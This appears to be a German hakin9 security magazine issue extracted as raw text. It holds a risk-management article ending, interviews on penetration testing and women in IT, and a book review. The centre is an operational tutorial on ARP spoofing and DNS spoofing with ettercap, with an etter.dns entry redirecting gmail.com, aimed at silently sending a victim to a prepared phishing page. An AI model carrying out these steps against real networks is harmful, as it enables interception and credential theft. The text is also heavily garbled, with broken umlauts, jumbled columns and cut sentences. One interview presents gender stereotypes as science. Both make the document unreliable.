bezogen auf die Informationstechnologie das Ge-genuumlberstellen der Anforderungen aus der Risikobe-wertung mit dem Ergebnis der durchgefuumlhrten Maszlig-nahmen und eine neue Bewertung dieser vergl Abb 5
Die Optionen zur Risikobehandlung werden in 4 Ka-tegorien eingeteilt
bestimmter Maszlignahmen etc)
tiger Verfahren)
Risikouumlberwachung und ndashakzeptanzBasierend hierauf erfolgt eine neue Bewertung des Restrisikos und der Risikomanagementprozess geht
Abbildung 4 Beispielhafte Risikomatrix (Bildquelle HMP)
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 35
uumlber in die Risikouumlberwachung Diesen Ablauf ndash auch PDCA-Prozess genannt (Plan-Do-Check-Act) ndash ken-nen Sie bereits aus dem vorherigen Artikel uumlber die ISO 27001 Eine neue Bewertung ist ebenfalls durchzufuumlh-ren wenn sich Vorgaben aumlndern neue Assets imple-mentiert werden oder die Bedrohungssituation sich aumln-dert
Bei der Risikoakzeptanz ist es wichtig die Entschei-dungskriterien detailliert zu dokumentieren damit sich auch spaumlter noch nachvollziehbar sind
RisikoreportingSinn des Risikoreportings ist zum einen die Informati-on des Managements uumlber den aktuellen Stand der Ri-sikosituation und der eingeleiteten Maszlignahmen zum anderen dient diese natuumlrlich auch der Dokumentation Weitere Inhalte koumlnnen zB sein das Sicherheitsbe-wusstsein zu verbessern oder das Einfordern von Ent-scheidungen
Die Ergebnisse von Risikobewertungen sind idR vertraulich und dementsprechend zu handhaben
Kapitel 4 ndash Nutzen und FazitDie Einfuumlhrung eines Risikomanagementsystems nach ISOIEC 270052008 unterscheidet sich vom Prozess her nur in Teilbereichen von der Einfuumlhrung eines kompletten Risikomanagementsystems nach ISOIEC 31000 Jedoch ist der Aufwand wesentlich geringer da es sich nur um einen Teilbereich des Un-ternehmens handelt Auch hier gilt wieder der Grund-satz dass Unternehmen die bereits ein Qualitaumltsma-nagement-System im Einsatz haben (zB ISO 9001) weniger Zeit benoumltigen da ihnen die Prozess-orien-
tierte Denkweise und das strukturierte Vorgehen be-reits vertraut sind
Ohne Informations- und Kommunikationstechnik kann heute kaum noch ein Unternehmen auskommen auch nicht zeitweise Das gilt auch fuumlr kleinere und mitt-lere Unternehmen genauso wie fuumlr Groszligunternehmen und Konzerne Deshalb sollte das Management wissen welche Risiken gerade im IT-Bereich bestehen und wie diesen begegnet werden kann Gerade im Bereich der Informations- und Telekommunikationssysteme sind die immateriellen Werte also diejenigen Werte denen nicht eine Einkaufsrechnung gegenuumlbergelegt werden kann haumlufig kaum bekannt
Die Norm ISOIEC 270052008 bietet den Vorteil dass mit einem kleinen Teilbereich (zB Netzwerk) be-gonnen werden kann und sukzessive weitere Assets einbezogen werden koumlnnen Zudem bietet die Norm im Anhang Beispiele und Checklisten fuumlr das Vorgehen
Abbildung 5 Ablauf Risikobehandlung (Bildquelle CIS)
ANDREAS LENTWOJTDer Autor ist Managementberater CEO und Inhaber bdquoAL-Consultldquo Nach dem Studium der Betriebswirtschaft mit den Schwerpunkten Organisation und IT arbeitete er langjaumlhrig bei Banken und Finanzdienstleistern als Organisations-IT-Leiter und spaumlter als Security-Offi cer 2004 gruumlndete er das Beratungsunternehmen ALConsult mit den Schwerpunk-ten Security und Prozessmanagement Er ist zertifi zierter ISO 27001-Auditor und besitzt weitere Zertifi kate wie CObIT und ITIL Der Schwerpunkt der Beratung liegt im organisatori-schen Bereich und den Prozessen nicht auf der Technik
DNS Cache Poisoning
hakin9orgde 37
Vor einiger Zeit habe daruumlber geschrieben
wie man mit SET auf einfache Art und Wei-
se eine Java Applet Attacke durchfuumlhren
kann Dieser Artikel lies aber offen wie man das
Opfer auf die praumlparierte URL umleitet was mitun-
ter wahrscheinlich der schwierigste Teil des ganzen
Angriffes ist Damit eine solche Attacke aber auch
erfolgreich eingesetzt werden kann dient dieser Ar-
tikel als Ergaumlnzung um diese Informationsluumlcke zu
fuumlllen
Um ein Opfer auf eine praumlparierte Seite umzuleiten
ist DNS Cache Poisoning (auch DNS Spoofing ge-
nannt) eine effektive und schnelle Moumlglichkeit Darunter
versteht man ein Angriff wobei Eintraumlge in einem DNS
zu eigenen Gunsten manipuliert werden
Das Opfer merkt dabei im Idealfall nichts davon Die-
ses tippt wie uumlblich zum Beispiel wwwgooglech ein
nur anstatt bei der DNS-Abfrage die IP-Adresse der
Google-Server zuruumlckkommt erhaumllt das Opfer die IP-
Adresse einer praumlparierten Seite
DNS Cache Poisoning
Als Ergaumlnzung zu meinem ersten Artikel Java Applet Attacke erfahren wir hier wie wir ein Opfer mittels DNS Spoofing unbemerkt eine praumlparierte Seite unterschieben koumlnnen
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
gement
Patrick Schmid
Abbildung 1 Eine Anfrage (rot) an Ziel
10201038
ANGRIFF
Wieder ein Beispiel dazu (Bild 2)
les nicht mehr die MAC-Adresse des Zieles son-
dern die des Angreifers zugeordnet ist
Paketes seinen ARP-Cache nach der MAC-Adres-
se des Zieles ab Aber anstatt von seinem ARP-
Cache auch die MAC-Adresse des Zieles zu erhal-
ten bekommt er die des Angreifers welche er in to-
taler Unwissenheit in sein Paket packt
Pakete aus und vergleicht diese mit seiner Zuord-
nungstabelle Anhand der MAC-Adresse (die des
Angreifers) sendet er das Paket an Port 2 und so-
mit an den Angreifer und nicht wie vom Opfer ge-
plant an das Ziel
Somit geht der Verkehr aber erst vom Opfer zum An-
greifer
Damit das Oper davon aber nichts merkt muss der
Angreifer die abgefangene Anfrage an das Ziel weiter-
leitenNun verlaumluft die Kommunikation schon vom Op-
fer uumlber den Angreifer zum Ziel
Damit man aber auch den gesamten Verkehr in die an-
dere Richtungen also Anfragen und Antworten mitkriegt
macht man ARP-Attacken immer auf den Client und den
Router Gateway gleichzeitig womit nun eine Kommuni-
kation vom Opfer uumlber den Angreifer zum Ziel und auch
wieder zuruumlck moumlglich ist Damit ist die Man-in-the-Middle-
Attacke komplett und der Angreifer ist in der Lage den
gesamten Netzwerkverkehr seines Opfers nicht nur ab-
zufangen und mit zuhoumlren sondern auch beliebig zu ver-
aumlndern was uns auch sogleich zu Schritt 2 bringt
Im ersten Artikel haben wir als Beispiel die Seite Gmail
kopiert und praumlpariert Also wollen wir auch gleich dort
anknuumlpfen
Fuumlr diese Attacke werden wir das Tool ettercap ver-
wenden da es relativ einfach aufgebaut ist dabei aber
trotzdem viele Einstellungsmoumlglichkeiten bietet
Unsere Attacke wird in zwei Stufen aufgebaut sein
Als erstes muumlssen wir das Opfer oder besser dessen
Computer dazu bringen seinen ganzen Traffic auf un-
seren Computer umzuleiten also eine sogenannte
Man-in-the-middle-Attacke ausfuumlhren
Dazu werden wir ARP Spoofing verwenden ARP ist
ein Protokoll auf Layer 2 (Sicherung) um anhand einer
IP-Adresse die zugehoumlrige MAC-Adresse abzufragen
Die Funktionsweise von ARP Spoofing ist einfach Der
Grund fuumlr dessen Erfolg ist der dynamische ARP-Cache
auf jedem Client und eine Zuordnungstabelle auf jedem
Switch Ein Switch fuumlhrt eine Zuordnungstabelle worin die
MAC-Adressen der angeschlossenen Geraumlte dem jeweili-
gem Port zugeordnet sind Diese gibt es deshalb weil ein
Switch somit genau weiss welches System an welchem
Port angeschlossen ist und somit auch an welchen Port
ein einzelnes Datenpaket weitergeleitet werden muss
Der Client fuumlhrt einen eigenen ARP-Cache worin er
eine MAC-Adresse einer IP-Adresse zuordnet sodass
er nicht vor jedem Versenden eines Paketes die MAC-
Adresse zu einer IP neu abfragen muss
Veranschaulicht koumlnnte das dann so ablaufen (Bild 1)
nen ARP-Cache nach der MAC-Adresse des Zieles
ab und packt diese danach mit in das Paket
aus und weiss anhand seiner Zuordnungstabelle
das zu dieser MAC-Adresse der Port 1 gehoumlrt wo-
rauf er das Paket an Port 1 und somit an das Ziel
weiterleitet
seines Opfers so veraumlndern dass eine IP-Adresse einer
total neuen beliebigen MAC-Adresse zugeordnet wird
Abbildung 2 Eine Anfrage (rot) an Ziel waumlhrend ARP-Spoofi ng
DNS Cache Poisoning
hakin9orgde 39
Nun gilt es fuumlr den Angreifer darauf zu warten bis das
Opfer den A-Record von gmailcom abfragt Sehen wir
nun in unserem mitgehoumlrten Traffic eine solche Anfra-
ge so muss das Antwortpaket soweit veraumlndert werden
dass anstatt die tatsaumlchliche IP-Adresse nun die IP-Ad-
resse zu unserer praumlparierten Seite uumlbermittelt wird
Das Opfer selbst empfaumlngt und akzeptiert das so
weil es selbst von der Veraumlnderung nichts mitbekommt
Alle Anfragen welche das Opfer von nun an an Gmail
macht werden nicht an Gmail selbst sondern an un-
sere praumlparierte Seite gesandt womit unser Vorhaben
erfuumlllt waumlre
So nun genug Theorie schreiten wir zur Tat
Beide Schritte koumlnnen direkt mit ettercap durchge-
fuumlhrt werden
Dabei handelt es sich um ein Stuumlck Software mit Spe-
zialisierung auf Man-in-the-Middle-Attacken welches
unter der GPL wahlweise fuumlr Windows Linux oder Mac
veroumlffentlicht wurde
Leider wurde es seit einiger Zeit nicht mehr weiter-
entwickelt was sich jedoch nicht auf die Funktionalitaumlt
auswirkt
Ettercap kann wahlweise via GUI oder Konsole be-
dient werden doch erstmal wird alles konfiguriert
Zuerst muumlssen wir unsere eigenen A-Rekords fuumlr
gmailcom anlegen Dazu editieren wir die Datei usr
shareettercapetterdns und erweitern diese um einen
Eintrag wie in Listing 1 dargestellt
Wenn wir nun speichern so haben wir festgelegt
dass Anfragen nach der IP von gmailcom oder gmail
com mit 127001 beantwortet werden sollen
Somit sind wir auch schon bereit und koumlnnen bereits
mit Schritt 1 beginnen
Dazu starten wir ettercap und waumlhlen unter dem
Punkt Sniff den Unterpunkt Unified sniffing aus Dabei
werden wir nach dem Interface gefragt uumlber welches
der Angreifer mit dem Netzwerk des Opfers verbunden
ist Im Falle einer Verbindung via Kabel ist das meist
eth0 bei WLAN meist wlan0
Ist auch das vollbracht so koumlnnen das oder die Ziele
identifiziert werden Dazu waumlhlen wir den Punkt Hosts gt
Scan for hosts wodurch automatisch alle 255 Hosts im
Subnet angepingt werden (Bild 3)
Ist auch das durchgestanden so koumlnnen die Ziele un-
ter Hosts gt Hosts list ausgewaumlhlt werden Als Target 1
muss der Router oder Gateway und das Opfer als Tar-
get 2 ausgewaumlhlt werden Hier muss gegebenenfalls
mit nmap nach gepruumlft werden um die IP des Opfers zu
identifizieren
Nun kann mit dem Selektieren von Mitm gt Arp poiso-
ning die ARP-Attacke gestartet und Schritt 1 somit be-
endet werden
Wird nun Wireshark oder tcpdump gestartet so kann
man allen Netzwerkverkehr des Opfers und des Rou-
ters Gateways mitgehoumlrt werden
Nun gleich weiter zu Schritt 2 Nachdem die Man-in-
the-Middle-Attacke steht koumlnnen wir dem Opfer nun
unsere DNS-Records aufzwingen
Dazu verwenden wir die ettercap-Plugins unter dem
Punkt Plugins gt Manage the plugins Da waumlhlen wir den
Punkt dns_spof aus
Und somit ist unser DNS-Spoofing-Angriff einsatzfauml-
hig und aktiv
Wem als Angreifer kein GUI zur Verfuumlgung steht der
kann auch den interaktiven Modus von ettercap ver-
wenden Dazu muss ettercap nur mit der Option -T auf-
gerufen werden Alles weitere ist dann in der Hilfe (h-
Taste) nachzulesen
Nun ist alles getan Jedes mal wenn nun unser Op-
fer die Webseite von Gmail aufruft wird es auf unsere
praumlparierte Seite umgeleitet ohne dass es davon etwas
merkt
In Kombination mit SET erhaumllt ein Angreifer so muumlhe-
los Zugriff auf ein fremdes System
Listing 1 ein A-Record fuumlr eine praumlparierte Seite von gmailcom
gmailcom A 127001
gmailcom A 127001
Abbildung 3 GTK-GUI von ettercap
Linkshttpseiconch Unternehmen des Autorshttpblogencodingitch
PATRICK SCHMIDDer Autor ist System Engineer im Bereich Linux Unix und unterstuumltzt nebenbei die Entwicklung und Verbreitung von Li-nux und Opensource im privaten wie auch im professionellen Umfeld
Interview mit Tobias Glemser
hakin9orgde 41
hakin9 Erzaumlhlen Sie uns bitte ein wenig uumlber sich selbst wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie sich mit IT-Sicherheit Branche beschaumlftigenTobias Glemser Mein Name ist Tobias Glemser ich bin leitender IT-Sicherheitsberater bei der Tele-Consul-ting security networking training GmbH in Gaumlufelden bei Stuttgart und verantwortlich fuumlr den Geschaumlftsbereich Penetrationstests Zu Schul- und Zivildienstzeiten hatte ich bereits den ersten Kontakt mit technischen Audits und habe schlicht das Hobby zum Beruf gemacht Seit uumlber zehn Jahren bin ich in entsprechenden Projekten taumltig Am Wichtigsten ist der kreative Umgang mit Sys-temen und Anwendungen Funktionen die ein Entwick-ler nach besten Wissen und Gewissen implementiert hat so zu nutzen dass sie nicht mehr dem urspruumlngli-chen Zweck dienen Im Projektumfeld erhaumllt man viele Einblicke in Techniken und Prozesse in unterschiedli-chen Firmen und Behoumlrden z B Energie Flugraum-uumlberwachung Banken Neben den technischen Aspek-ten ist es mein und unser Ziel mit allen Beteiligten des Kunden ein gemeinsames Ziel zu erreichen So waumlre es aus meiner Sicht unsinnig technische Schwachstellen mit rein technischen Hilfestellungen zu beheben Der Ansatz springt deutlich zu kurz Vielmehr geht es auch darum auf Prozesse abzuleiten und diese zu verbes-sern Diese Nachhaltigkeit und die positiven Ruumlckmel-dungen treiben an Daruumlber hinaus bin ich frei in der Beratung d h wir haben keine Produkte im Portfolio die bei einem technischen Audit moumlglichst gleich mit an-gepriesen werden muumlssen
hakin9 Bereits bei mehreren tausend Tests von Netzen und Systemen haben Sie den selbstentwickelten Security Scanner tajanas genutzt Was unterscheidet tajanas von anderen solchen WerkzeugenTobias Glemser Wir haben tajanas zunaumlchst fuumlr ei-gene Zwecke entwickelt und setzten es auch heute als Basis in Penetrationstests ein tajanas ist ein Frame-
work und Webfrontend fuumlr die grundsaumltzliche Pruumlfung eines Systems mit automatisierten Port- und Vulnera-bility-Scans und einheitlichem Reporting pro System Wir haben dabei das Ziel verfolgt nicht das Rad neu zu erfinden sondern etablierte Programme fuumlr die ei-gentlichen Pruumlfungen zu nutzen Die Ergebnisse der einzelnen Schritte werden analog zu einer manuellen Pruumlfung mit den jeweiligen Programmen automatisiert verknuumlpft Dies ermoumlglicht eine wesentliche schnellere Durchfuumlhrung bei gleicher Ergebnis-Qualitaumlt Daruumlber hinaus ist die Oberflaumlche so gehalten dass nur die not-wendigsten Optionen zur Verfuumlgung stehen
Neben der Schwachstellen-Pruumlfung ist auch eine Erreichbarkeitspruumlfung integriert um einen schnellen Uumlberblick uumlber aktive Systeme in Netzen zu erhalten
Es ist wichtig zu verstehen dass Penetrationstests ohne automatisierte Tests nicht funktionieren Die schie-re Anzahl an Schwachstellen laumlsst sich nur sinnvoll mit entsprechenden Programmen pruumlfen Die Ergebnisse sind dann die Basis fuumlr weitere manuelle Tests Dabei wird mit Know-How und Kreativitaumlt versucht weitere Luumlcken zu finden um und diese dann auszunutzen
hakin9 Wie erfolgt die Bedienung des Scanners und welche Lizenzen und Module existierenTobias Glemser Die Bedienung erfolgt vollstaumlndig uumlber eine webbasierte Oberflaumlche tajanas wird als VM-ware- oder Hardware-Appliance ausgeliefert der End-benutzer kann alle Funktionen ndash dazu gehoumlren auch Ak-tualisierungen ndash uumlber die Weboberflaumlche nutzen Jeder Nutzer erhaumllt natuumlrlich trotzdem vollstaumlndigen Root-Zu-griff auf das System Die Lizenzierung erfolgt pro In-stallation eine Limitierung auf IP-Adressen oder eine gewisse Anzahl Scans erfolgt nicht Neben dem Audit-Modul gibt es auch ein Modul fuumlr die Erreichbarkeits-pruumlfung
hakin9 Woher kommt der Name tajanasTobias Glemser tajanas steht fuumlr bdquothis ainrsquot just ano-ther network scannerrdquo ndash weil es ein wie beschrieben ein
bdquoSicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollinstrument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgreichen Produkts gesehen werdenldquoInterview mit Tobias Glemser
10201042
INTERVIEW
Nach der Durchfuumlhrung erhaumllt der Kunde einem umfas-senden auf seine Umgebung und Realitaumlt angepass-ten Ergebnisbericht der im Rahmen eines Abschluss-Workshops mit den technischen verantwortlichen besprochen wird Auf Wunsch erfolgt auch die Darstel-lung vor dem Vorstand bzw der Leitungsebene
Das Spektrum eines Penetrationstests ist sehr viel-faumlltig und laumlsst sich nur schwer darstellen Es handelt sich dabei jedoch nicht zwingend um die bdquobekanntenldquo Pruumlfungen auf Serversysteme Haumlufige Einfallstore fuumlr Angreifer sind schlecht gesicherte lokale Netzwerke Client-Systeme oder auch Multifunktionsdrucker Bei Interesse finden sich Informationen z B in der Studie Penetrationstests des BSI dem Whitepaper Penetrati-
onstests der Tele-Consulting oder auch dem Whitepa-per Projektierung der Sicherheitspruumlfung von Weban-
wendungen der OWASP
hakin9 Welche Plaumlne die IT-Sicherheit Branche betreffend haben Sie noch vorTobias Glemser Abseits von technischen Audits ver-suchen wir ganzheitliche Prozesse vor allem aber nicht nur in den IT-Abteilungen zu etablieren und dabei Ad-ministratoren die Hilfestellungen zu geben die sie da-bei benoumltigen Als Sicherheitsberater oder auch Sicher-heitsbeauftrager eines Unternehmens nimmt man meist die Rolle eines Kontrolleurs ein der darauf achtet dass Regeln eingehalten werden Hier ist ein Wandel erfor-derlich sowohl bei denen die sich bdquoSicherheitldquo auf die Fahnen schreiben als auch bei den Administratoren und Verantwortlichen fuumlr Geschaumlftsbereiche und deren Technik Sicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollin-strument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgrei-chen Produkts gesehen werden Hier muumlssen auch und vor allem Sicherheitsberater umdenken um vorrangig als Unterstuumltzer die sie sind gesehen und akzeptiert zu werden Nur so begreifen die technisch verantwort-lichen Mitarbeiter Sicherheitspruumlfungen nicht als Pruuml-fungen ihrer persoumlnlichen Kompetenz sondern als kon-krete Unterstuumltzung fuumlr die Verbesserung vorhandener Sicherheitsprozesse
Im Bereich der technischen Schwachstellen werden weiterhin Webanwendungen eine groszlige Rolle spielen Daher bin ich seit geraumer Zeit beim Open Web Appli-cation Security Project (OWASP) den meisten vermut-lich durch die OWASP Top 10 bekannt ehrenamtlich taumltig und seit diesem Jahr im Board der deutschen Sek-tion Beim OWASP Stammtisch Stuttgart (und Stamm-tischen in anderen Staumldten) tauschen sich hier auch Menschen rund um das Thema zwanglos aus Wer Lust hat vorbeizukommen kann sich auf der deutschen OWASP Webseite informieren
Wir bedanken uns fuumlr das Gespraumlch
Framework darstellt und nicht den n-ten Port- oder Vul-nerability-Scanner Wenn wir Bugs in den verwendeten Programmen feststellen oder Ideen fuumlr Erweiterungen haben geben wir diese direkt in die Community zuruumlck
hakin9 Wer sind Benutzer von tajanasTobias Glemser Zum einen natuumlrlich wir selbst Zum anderen setzten IT-Sicherheitsbeauftragte und IT-Revi-soren das Tool fuumlr regelmaumlszligige Sicherheitspruumlfungen ihrer Netze ein
hakin9 Fuumlr welche Faumllle reichen Penetrationstests nicht ausTobias Glemser Das haumlngt von der Zieldefinition des Kunden ab und was man unter einem Penetrationstest versteht Bei Tele-Consulting sind alle Mitarbeiter nicht nur in technische Audits wie Penetrationstests eingebun-den sondern auch in prozessorientierte Beratungen und Audits wie z B ISO 27001 oder BSI IT-Grundschutz Dies ermoumlglicht es uns in technischen Audits nicht nur die technischen Luumlcken aufzuzeigen sondern auch auf fehlende oder mangelhafte Prozesse hinzuweisen und konkrete Vorschlaumlge zur Verbesserung zu geben
hakin9 Koumlnnen Sie uns ein konkretes Beispiel nennenTobias Glemser Nehmen wir an dass aus Wirtschaft-lichkeitsgruumlnden nicht alle Server in einem Netz in ein technisches Audit einbezogen werden sondern nur eine definierte Anzahl Stellt man hier Schwachstellen fest so genuumlgt es nicht die erkannten Schwachstellen oder gar Luumlcken zu schlieszligen sondern man muss sich fra-gen wie es zu den Schwachstellen kommen konnte In den seltensten Faumlllen haben hier Administratoren indi-viduelle Fehler gemacht vielmehr scheinen offensicht-lich die Vorgaben zur Serverkonfiguration bzw Haumlrtung nicht ausreichend zu sein bzw diese in ein Information Security Management System (ISMS) integriert zu sein Darauf weisen wir nachdruumlcklich in unseren Ergebnis-berichten hin um eine Gesamtverbesserung zu erzie-len und unterstuumltzen bei Bedarf auch bei der Umset-zung der organisatorischen Anteile
Geht man diesen Schritt nicht werden erfahrungs-gemaumlszlig nur die Systeme veraumlndert bei denen im Test Schwachstellen erkannt wurden Der Verbesserung der Gesamtsicherheit hilft dies dann allerdings nicht
hakin9 Wie sieht eine Sicherheitsuumlberpruumlfung mithilfe des Penetrationstests ausTobias Glemser Zunaumlchst bedarf es einer klaren Ziel-vorstellung Entweder haben Kunden diese bereits oder sie wird im Rahmen eines Workshops gemeinsam erarbeitet Dabei ist es meist sinnvoll mehrstufig vorzu-gehen und die Themen in verschiedenen Arbeitspake-ten abzuarbeiten Im Rahmen eines Kick-Offs werden die Beteiligten informiert und in den Ablauf integriert
10201044
INTERVIEW
hakin9 Lassen Sie uns bitte ein wenig uumlber sich selbst wissen wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie in der IT-Branche taumltig sindUlrike Peter Ich bin PR-Spezialistin und Journalis-tin durch und durch Die Liebe zum Schreiben ent-deckte ich fruumlh Nach ersten Gehversuchen als freie Mitarbeiterin bei einer Tageszeitung absolvierte ich vor zehn Jahren ein Volontariat in einer PR-Agentur mit parallelem Fernstudium bdquoJournalismusldquo Die ers-ten Tage in der Agentur waren wie ein Kopfsprung ins kalte Wasser Denn obwohl ich das journalistische Ruumlstzeug besaszlig wusste ich anfangs nicht mal wo sich die Escape-Taste an meinem PC befand hatte aber die Aufgabe ohne spezielles Hintergrundwissen uumlber komplexe Technologien detaillierte Berichte zu formulieren Da dies den Ehrgeiz in mir weckte ar-beitete ich mich schnell in die Materie ein und stell-te fest dass Public Relations in Verbindung mit der Erstellung technologischer Texte mein Steckenpferd ist Heute bin ich Geschaumlftsfuumlhrerin meiner eigenen PR-Agentur und obwohl ich mittlerweile auch in wei-teren Branchen und Aufgabengebieten zuhause bin ist die Freude daran bdquotrockeneldquo und komplexe Inhalte lebendig werden zu lassen noch genauso vorhanden wie am ersten Tag
hakin9 Viele glauben dass Computer Maumlnnersache sind Was halten Sie davonUlrike Peter Die landlaumlufige Meinung existiert nach wie vor dass Maumlnner ein besseres technologisches Verstaumlndnis mitbringen Dies resultiert nicht selten aus Vorurteilen laumlsst sich aber auch nicht komplett abstreiten Denn nicht nur Erfahrungswerte sondern auch Belege aus der Hirnforschung zeigen dass Frauen besser mit Sprache umgehen koumlnnen und Maumlnner sich in Naturwissenschaften wohler fuumlhlen Es liegt wohl ein Stuumlck weit in der Natur der Sache
Aber wie heiszligt es so schoumln bdquoAusnahmen bestaumltigen die Regelldquo Und der Trend zeigt beispielsweise dass Frauen zunehmend technische Studiengaumlnge bele-gen
hakin9 Heutzutage sind wir uumlberall von Computern umgeben In der IT-Branche herrscht trotzdem ein Frauenmangel Woran liegt dies Ihrer Meinung nachUlrike Peter Noch lockt es wesentlich mehr Maumlnner in technische Berufe als Frauen Ich denke das Verhaumlltnis wird auch in Zukunft so bleiben ndash auch wenn sich die klassische Rollenverteilung verschiebt und die bdquoGren-
bdquoErfolgreiche Frauen in der IT-Branche - ein Erfahrungsberichtldquo
Interview mit Ulrike Peter
Interview mit Ulrike Peter
hakin9orgde 45
Vorgesetzten und zum anderen nach den Faumlhigkeiten der Frau Jeder Mitarbeiter der neu eingestellt wird steht vor der Aufgabe sich zu beweisen ndash und sollte die Moumlglichkeit dazu erhalten Jedoch werden Frau-en in typischen Maumlnnerberufen oft kritischer beaumlugt und stehen laumlnger auf dem Pruumlfstand Dies passiert teils unbewusst Auch beweisen Studien immer wie-der dass maumlnnliche Arbeitnehmer im gleichen Job mehr verdienen als weibliche Hier macht die Gesell-schaft aber eine Entwicklung durch und dies reguliert sich sicherlich zumindest ein Stuumlck weit im Laufe der naumlchsten Jahre
hakin9 Was macht Ihnen am meisten Spaszlig bei der Arbeit in der IT-BrancheUlrike Peter Bevor ich mich selbstaumlndig machte war ich bereits in einem anderen Unternehmen in der Ge-schaumlftsleitung taumltig ndash jedoch konnte ich den Stift zum Schreiben nie aus der Hand legen Es reizt mich im-mer wieder neue technologische Themen zu erkunden und dabei nicht nur an der Oberflaumlche zu kratzen son-dern Detailtiefe zu erlangen um fundiert und lesens-wert uumlber ein Thema berichten zu koumlnnen Im Laufe der Jahre habe ich eine starke Affinitaumlt zur IT-Security entwickelt Ich finde es spannend uumlber Sicherheits-luumlcken Verschluumlsselungstechniken und vieles weite-re zu schreiben Daruumlber hinaus macht es mir groszligen Spaszlig IT-Unternehmen durch die richtige PR-Strategie nach vorn zu bringen und entsprechende Maszlignahmen in die Tat umsetzen Beim Kennenlernen eines poten-ziellen Neukunden im ersten Moment manchmal hin-sichtlich der technischen Fachkompetenz unterschaumltzt zu werden und dann schnell durch Know-how zu uumlber-zeugen bestaumltigt mich immer wieder in dem was ich tue
hakin9 Was sollte unternommen werden um die Ressentiments von Frauen gegenuumlber IT-Jobs abzubauenUlrike Peter Ich glaube dem kann man bzw Frau nur entgegenwirken indem sie den Mut hat ihre Interessen zu verfolgen und sie unter Beweis zu stellen Aus Er-fahrung wenn jemand seine Faumlhigkeiten zeigt und en-gagiert an eine Sache herangeht ruumlckt das Geschlecht automatisch in den Hintergrund
Wir bedanken uns fuumlr das Gespraumlch
zenldquo in beide Richtungen mehr und mehr verschwim-men Denn auch Maumlnner finden wir heute in Berufen die vor Jahren ausschlieszliglich Frauen zugeordnet wur-den Und wir sind zwar von elektronischen Geraumlten wie PCs Smartphones etc umgeben und diese werden auch rege von beiden Geschlechtern genutzt ndash aber ei-nen technischen Job zu ergreifen ist ein anderes paar Schuhe Hierzu gehoumlrt ein besonderes Faible Die Be-weggruumlnde weshalb in diesem Segment Frauenman-gel herrscht sind meiner Meinung nach Ihnen fehlt manchmal der Mut sie erhalten nicht immer die glei-chen Chancen oder ndash und das wird der Hauptgrund sein ndash es liegen schlichtweg die Interessen in anderen Be-reichen
hakin9 Woraus resultieren die Vorurteile gegen die Frauen die sich mit Computern beschaumlftigenUlrike Peter Die IT ist (und bleibt es sicher auch) eine Maumlnnerdomaumlne ndash Frauen in der IT-Branche sind Para-diesvoumlgel Wie in allen Berufen in denen seit jeher ein Geschlecht etabliert ist sich Prozesse eingeschliffen und bewaumlhrt haben ist es erst einmal fremd und ge-woumlhnungsbeduumlrftig wenn sie sich veraumlndern So liegen die Vorurteile zum einen daran dass es nicht uumlblich ist wenn Frauen in diesen Berufen arbeiten und Maumlnnern die bdquoTechnikldquo zugeordnet wird ndash zum anderen resultie-ren sie daraus dass die unterschiedlichen Faumlhigkeiten und Interessen der Geschlechter einfach naturgege-ben sind So wie kleine Jungen mit Autos spielen und Maumldchen mit Puppen stecken auch spaumlter gewisse Verhaltensweisen und Interessen in uns die bereits in der Kindheit gepraumlgt werden Greift das weibliche Ge-schlecht im Berufsleben ploumltzlich zum bdquoAutoldquo so ist dies ungewoumlhnlich und wird erst einmal hinterfragt
hakin9 Wie sieht die Situation von Frauen in der IT-Branche aus Ist es leicht als begabte IT-Expertin einen Job in einem Unternehmen zu bekommenUlrike Peter Frauen in der IT-Branche sind haumlufig in Marketingabteilungen zu finden ndash aber zum Beispiel auch bei der schreibenden Zunft in Fachverlagen In diesen Jobs herrscht in meinen Augen Chancengleich-heit Als IT-Expertin in einem technischen Beruf wie Ad-ministrator Entwickler oder Aumlhnliches sieht es dagegen anders aus In diesem Segment haben es weibliche Fachkraumlfte meiner Ansicht nach schwerer Die Huumlrde zum Bewerbungsgespraumlch eingeladen zu werden ist houmlher Bekommt sie die Chance dazu wird vielleicht et-was genauer hingeschaut aber letztlich zaumlhlt die Kom-petenz die unterm Strich den entscheidenden Aus-schlag geben wird
hakin9 Wie werden Frauen von Maumlnnern als ihre Mitarbeiter wahrgenommenUlrike Peter Dies laumlsst sich nicht pauschalisieren und richtet sich zum einen nach der Einstellung des
10201046
REZENSIONEN
Das Buch SAP for DFPS Implementierung und Customizing basiert auf mehr als 20 Jahren Er-fahrung die die Autoren insgesamt bei der Ent-
wicklung Implementierung aber auch Schulung der Loumlsung sammeln konnten
Die uumlber 650 Seiten vollgepacktes Wissen sollten sie nicht abschrecken dieses Buch in die Hand zu nehmen Es ist sehr gut und fluumlssig geschrieben Man schafft es sollten sie ein schneller LeserIn sein in zwei Tagen
Sie benoumltigen keine tiefgreifenden SAP-Kenntnisse zum Verstaumlndnis daher ist es fuumlr Entscheider genauso geeignet wie fuumlr Projektleiter Architekten funktionale Mitarbeiter Basismitarbeiter oder externe Berater
Komplexe Zusammenhaumlnge werden sehr schoumln und bildhaft beschrieben damit auch fuumlr den SAP-Laien das Vorgehen verstaumlndlich beschrieben wird Erwaumlh-nenswert finde ich in diesem Zusammenhang Rubiks Zauberwuumlrfel
Das Buch ist sehr strukturiert aufgebaut und umfasst unverzichtbare Grundlagen in den Teilen I-IIIFuumlr Experten wird es dann in Teil IV richtig spannend und interessant
Die von SAP entwickelte fast eierlegende Wollmilch-sau erfordert ein umfangreiches Nachschlagewerk zur Implementierung Den Autoren ist dies hiermit gelun-gen
Ihnen ist es auszligerdem gelungen aufzuzeigen wie komplexe bdquoUnternehmensstrukturenldquo bewaumlltigt und Kos-ten reduziert und kontrolliert werden koumlnnen
Das Beispielprojekt bdquoTsunamildquo verdeutlicht dabei an einem nicht so komplexen Projekt die Anforderungen Beleuchtet wird zB wie militaumlrische Kernprozesse wie etwa die Logistik substanzielle Einsparungen von ca 30 erzielen koumlnnten als auch die Unterstuumltzung von Einsaumltzen verbessert werden koumlnnten (Beschleunigung der Verlegung um bis zu 50 -70)
